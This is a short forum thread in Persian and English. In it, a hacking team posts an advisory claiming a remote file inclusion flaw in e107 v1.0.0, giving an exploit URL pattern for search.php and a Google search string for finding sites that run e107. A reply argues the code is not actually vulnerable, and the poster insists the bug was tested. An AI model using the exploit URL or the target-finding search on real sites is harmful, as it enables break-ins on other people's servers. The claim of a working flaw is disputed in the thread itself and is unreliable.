E107 V.1.0.0 Remote File Include Vulnerabilities

[irist]

کد PHP:

############################################################################################################################################
***nbsp;                                                                                                                                         #
***nbsp;                          ISlamic Republic Of IRan Security Team                                                                         #
***nbsp;                                                                                                                                         #
***nbsp;                               http://irist.ir/forum/                                                                                    #
***nbsp;                                                                                                                                         #
############################################################################################################################################
***nbsp;                                                                                                                                         #
***nbsp;E107 V.1.0.0 Remote File Include Vulnerabilities                                                                                         #
***nbsp;                                                                                                                                         #
***nbsp;Download......: http://e107.org/edownload.php                                                                                            #
***nbsp;                                                                                                                                         #
***nbsp;Exploit.......: http://www.site.com/***91;path***93;/search.php?plug_require=***91;RFI***93;                                                                 #
***nbsp;                                                                                                                                         #
***nbsp;Google Search.: "Powered by e107"                                                                                                        #
***nbsp;                                                                                                                                         #
############################################################################################################################################
***nbsp;                                                                                                                                         #
***nbsp;Bug Found.....: IrIsT.Ir                                                                                                                 #
***nbsp;                                                                                                                                         #
***nbsp;discovery.....: Am!r (IrIsT™)                                                                                                            #
***nbsp;                                                                                                                                         #
***nbsp;contact.......: Amir***91;at***93;IrIsT.ir                                                                                                         #
***nbsp;                                                                                                                                         #
***nbsp;SP TNX........: The-0utl4w & A.u.r.A & B3HZ4D & m3hdi & joker_s & R3ZA BLACK HAT & kalkal-hacking & Nex^d3v!l & SeCuRiTy                 #
***nbsp;                                                                                                                                         #
***nbsp;  IrIsT.Ir & Aria-security.Com & H4ckcity.org & Iranhack.Org &  Zarbat.org  &  kalkalhacking.ooq.ir & All Iranian Team                   #
***nbsp;                                                                                                                                         #
###########################################################################################################################################***nbsp;


[singleye]

دوست عزیز چیزی که شما گذاشتین برای نسخه انگلیس زبان
دوم اینکه این اصلا آسیب پذیری نیست چو تابع search_info در بالای آن به صورت متغیر برابر آرایه قرار گرفته و متغیر که نام بردین به عنواو آرگامن تابع وجود داره و پایین فقط برای شرط استفاده شده است
قرار نیست هر متغییری که داخل require_once قرار گرفت آسیب پذیر باشد
هرکی که سیبیل داشت بابام که نیست
موفق باشی

[irist]

با سلام.
دوست عزیز با تشکر از شما.
باید بگم که قبل از ثبت هر باگی,اول اون تست می شه.هم روی لوکال و هم توی ریموت.بعد ثبت می شه.
سایتی هم که باگ رو ثبت میکنه,اول خودش تست می زنه روی پورتال.بعد ثبت می شه.
موفق باشید